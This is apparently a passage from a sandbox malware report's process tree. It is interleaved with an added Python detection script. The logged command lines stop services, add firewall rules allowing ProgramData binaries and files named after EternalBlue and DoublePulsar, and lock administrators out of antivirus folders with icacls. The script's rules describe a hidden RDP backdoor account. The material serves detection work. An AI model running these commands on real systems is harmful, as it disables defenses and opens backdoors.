    cmd: C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
    [depth 4 | PID 3356] C:\Windows\SysWOW64\sc.exe
      cmd: sc stop MicrosoftMysql
      - Launches sc.exe
  [depth 3 | PID 5692] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
    [depth 4 | PID 5220] C:\Windows\SysWOW64\sc.exe
      cmd: sc delete MicrosoftMysql
      - Launches sc.exe
  [depth 3 | PID 2076] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
    [depth 4 | PID 1176] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall set allprofiles state on
      - Modifies Windows Firewall
  [depth 3 | PID 2984] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    [depth 4 | PID 3960] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      - Modifies Windows Firewall
  [depth 3 | PID 2980] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    [depth 4 | PID 5544] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      - Modifies Windows Firewall
  [depth 3 | PID 5152] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    [depth 4 | PID 2856] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      - Modifies Windows Firewall
  [depth 3 | PID 5356] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    [depth 4 | PID 372] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      - Modifies Windows Firewall
  [depth 3 | PID 2400] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    [depth 4 | PID 3112] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      - Modifies Windows Firewall
  [depth 3 | PID 2124] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    [depth 4 | PID 3128] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      - Modifies Windows Firewall
  [depth 3 | PID 4476] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    [depth 4 | PID 2180] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      - Modifies Windows Firewall
  [depth 3 | PID 4592] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    [depth 4 | PID 5856] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      - Modifies Windows Firewall
  [depth 3 | PID 1936] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    [depth 4 | PID 2664] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      - Modifies Windows Firewall
  [depth 3 | PID 3412] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    [depth 4 | PID 3484] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      - Modifies Windows Firewall
  [depth 3 | PID 6052] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    [depth 4 | PID 5848] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      - Modifies Windows Firewall
  [depth 3 | PID 1756] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    [depth 4 | PID 5544] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
      - Modifies Windows Firewall
  [depth 3 | PID 2016] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    [depth 4 | PID 4700] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
      - Modifies Windows Firewall
  [depth 3 | PID 5124] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    [depth 4 | PID 1176] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
      - Modifies Windows Firewall
  [depth 3 | PID 4976] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    [depth 4 | PID 1724] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
      - Modifies Windows Firewall
  [depth 3 | PID 212] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    [depth 4 | PID 5356] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
      - Modifies Windows Firewall
  [depth 3 | PID 348] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    [depth 4 | PID 1012] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
      - Modifies Windows Firewall
  [depth 3 | PID 648] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    [depth 4 | PID 4592] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
      - Modifies Windows Firewall
  [depth 3 | PID 2180] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    [depth 4 | PID 5676] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
      - Modifies Windows Firewall
  [depth 3 | PID 4808] C:\Windows\SysWOW64\cmd.exe
    cmd: C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    [depth 4 | PID 2132] C:\Windows\SysWOW64\netsh.exe
      cmd: netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      - Modifies Windows Firewall
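The chain recorded above is the kind of thing a detection engineer turns into rules: RDP switched on in the registry and opened in the firewall, a local account created, added to the administrators and remote-desktop groups under several locale-specific names and then hidden from the logon screen through SpecialAccounts\UserList, the RDP Wrapper installer, a service given the display name "Microsoft Framework", anti-malware services stopped and deleted, scheduled tasks and an AppLocker policy pointing into ProgramData, and firewall rules that block inbound SMB while allowing binaries under ProgramData (including files named after Doublepulsar and Eternalblue). The script below is an added example, not part of this report and not any vendor's signature set. It runs regex rules over process-creation events (Sysmon event 1 / Security 4688 style) and then correlates the create, group-add and hide steps per account name. The events are constructed from command lines shown on this page; the PIDs are the report's, the parent PIDs are assumed, and the rule names and severities are this example's own.

```python
"""Detection rules for the post-exploitation chain in this report.

Added example, not part of the original sandbox report and not a vendor's
signature set. Events are constructed from command lines shown on this
page; PIDs are the report's, parent PIDs are assumed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class Event:          # one process-creation record
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class Alert:
    rule: str
    severity: str
    pid: Optional[int]
    fields: Dict[str, object] = field(default_factory=dict)


# (rule name, severity, pattern searched in the command line); named groups
# become alert fields. Group names are captured as-is, so the localized
# variants ("Администраторы", "Administratorzy", ...) match as well.
RULES: List[Tuple[str, str, "re.Pattern[str]"]] = [
    ("rdp_enabled_via_registry", "medium",
     re.compile(r"Terminal Server.*fDenyTSConnections.*/d\s*0", re.I)),
    ("local_account_created", "low",
     re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\"?(?P<user>[^\"\s]+)\"?\s+\S+\s+/add", re.I)),
    ("account_added_to_privileged_group", "medium",
     re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+\"?(?P<group>[^\"]+?)\"?\s+\"?(?P<user>[^\"\s]+)\"?\s+/add", re.I)),
    ("account_hidden_from_logon_ui", "high",
     re.compile(r"Winlogon\\SpecialAccounts\\UserList.*?/v\s+\"?(?P<user>[^\"\s]+)\"?.*/d\s*0", re.I)),
    ("firewall_opens_rdp", "medium",
     re.compile(r"netsh.*advfirewall.*add rule.*localport=3389.*action=allow", re.I)),
    ("rdp_wrapper_install", "high",
     re.compile(r"RDPWInst(?:\.exe)?\"?\s+-i\b", re.I)),
    ("security_service_removed", "high",
     re.compile(r"\bsc(?:\.exe)?\s+(?:stop|delete)\s+\"?(?P<service>mbamservice|bytefenceservice)\b", re.I)),
    ("service_display_name_spoof", "medium",
     re.compile(r"\bsc(?:\.exe)?\s+config\s+(?P<service>\S+)\s+DisplayName=\s*\"Microsoft", re.I)),
    ("scheduled_task_from_programdata", "medium",
     re.compile(r"schtasks.*?/create.*?/TR\s+\"?[A-Z]:\\ProgramData\\", re.I)),
    ("applocker_policy_from_programdata", "high",
     re.compile(r"Set-AppLockerPolicy.*-XMLPolicy\s+[A-Z]:\\ProgramData\\", re.I)),
    ("firewall_allows_programdata_binary", "medium",
     re.compile(r"netsh.*add rule.*action=allow.*program=\"[A-Z]:\\ProgramData\\", re.I)),
    ("firewall_blocks_smb_inbound", "low",
     re.compile(r"netsh.*add rule.*localport=(?:445|139).*action=block", re.I)),
]

NETSH, NET, REG, SC = (r"C:\Windows\SysWOW64\netsh.exe", r"C:\Windows\SysWOW64\net.exe",
                       r"C:\Windows\SysWOW64\reg.exe", r"C:\Windows\SysWOW64\sc.exe")
EVENTS: List[Event] = [  # constructed from this report; ppid values assumed
    Event(4556, 2888, REG, r'reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f'),
    Event(3952, 2888, NETSH, r'netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow'),
    Event(644, 2888, NET, r'net.exe user "john" "12345" /add'),
    Event(1416, 2888, NET, r'net localgroup "Administrators" John /add'),
    Event(2988, 2888, NET, r'net localgroup "Remote Desktop Users" John /add'),
    Event(5388, 2888, r"C:\rdp\RDPWInst.exe", r'"RDPWInst.exe" -i -o'),
    Event(6804, 2888, REG, r'reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f'),
    Event(5420, 4420, SC, r'sc config RManService DisplayName= "Microsoft Framework"'),
    Event(3304, 4420, SC, r"sc stop mbamservice"),
    Event(5108, 5544, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r'PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"'),
    Event(4132, 3040, r"C:\Windows\SysWOW64\schtasks.exe", r'"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1'),
    Event(1176, 2076, NETSH, r"netsh advfirewall set allprofiles state on"),
    Event(3960, 2984, NETSH, r'netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN'),
    Event(1724, 4976, NETSH, r'netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes'),
]


def scan(events: List[Event]) -> List[Alert]:
    """One alert per (event, matching rule); named groups become fields."""
    alerts: List[Alert] = []
    for ev in events:
        for rule, severity, pattern in RULES:
            m = pattern.search(ev.cmdline)
            if m:
                fields = {k: v for k, v in m.groupdict().items() if v is not None}
                alerts.append(Alert(rule, severity, ev.pid, fields))
    return alerts


BACKDOOR_STEPS = {"local_account_created", "account_added_to_privileged_group",
                  "account_hidden_from_logon_ui"}


def correlate(alerts: List[Alert]) -> List[Alert]:
    """Raise one critical alert per account that was created, added to a
    local group and hidden from the logon screen; record whether RDP was
    also enabled and opened in the firewall within the same event set."""
    seen: Set[str] = {a.rule for a in alerts}
    rdp_exposed = {"rdp_enabled_via_registry", "firewall_opens_rdp"} <= seen
    steps_by_user: Dict[str, Set[str]] = defaultdict(set)
    for a in alerts:
        if "user" in a.fields:
            steps_by_user[str(a.fields["user"]).lower()].add(a.rule)
    return [Alert("hidden_backdoor_account", "critical", None,
                  {"user": user, "rdp_exposed": rdp_exposed})
            for user, steps in sorted(steps_by_user.items())
            if BACKDOOR_STEPS <= steps]
```

Two design points carry over to production rules. The account-name correlation is case-insensitive because the chain above creates "john" and then adds "John" to groups; a rule keyed on the exact string would miss it. And the `firewall_blocks_smb_inbound` rule is deliberately low severity on its own: closing 445/139 looks like hardening, and it is only the combination with the allow rules for ProgramData binaries and the RDP backdoor that makes it part of an intrusion.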
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 3992)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\System32\Conhost.exe (PID 1936)
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 1524)
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 2760)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 2984)
    icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 5692)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 5852)
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 6048)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 2400)
    icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 6052)
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 2728)
    icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 3468)
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 660)
    icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 3316)
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 1416)
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 3416)
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 1104)
    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 472)
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 4368)
    icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 4588)
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 2124)
    icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 3128)
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 2760)
    icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 1716)
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 5132)
    icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 1244)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 1028)
    icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 4772)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
[depth 4] C:\Windows\System32\Conhost.exe (PID 648)
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 5772)
    icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 4556)
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 3932)
    icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 5412)
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 5560)
    icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 2132)
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 2416)
    icacls c:\programdata\Malwarebytes /deny Admin:(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 1936)
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 1820)
    icacls c:\programdata\Malwarebytes /deny System:(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 3972)
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
[depth 4] C:\Windows\System32\Conhost.exe (PID 1524)
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 4200)
    icacls C:\Programdata\MB3Install /deny Admin:(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 3904)
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 2012)
    icacls C:\Programdata\MB3Install /deny System:(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 4464)
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 4448)
    icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 1724)
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 1848)
    icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 444)
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\System32\Conhost.exe (PID 5124)
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 1264)
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 2016)
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 3408)
    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 4540)
    C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 5572)
    icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 6100)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 2376)
    icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 2988)
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 4492)
    icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 5856)
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 628)
    icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 4948)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 2760)
    icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 1756)
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 3128)
    icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 756)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 5944)
    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 4256)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 1676)
    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 4680)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 3212)
    icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 5284)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 2600)
    icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 3980)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\System32\Conhost.exe (PID 1264)
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 3340)
    icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 4556)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 5292)
    icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 5096)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 4284)
    icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
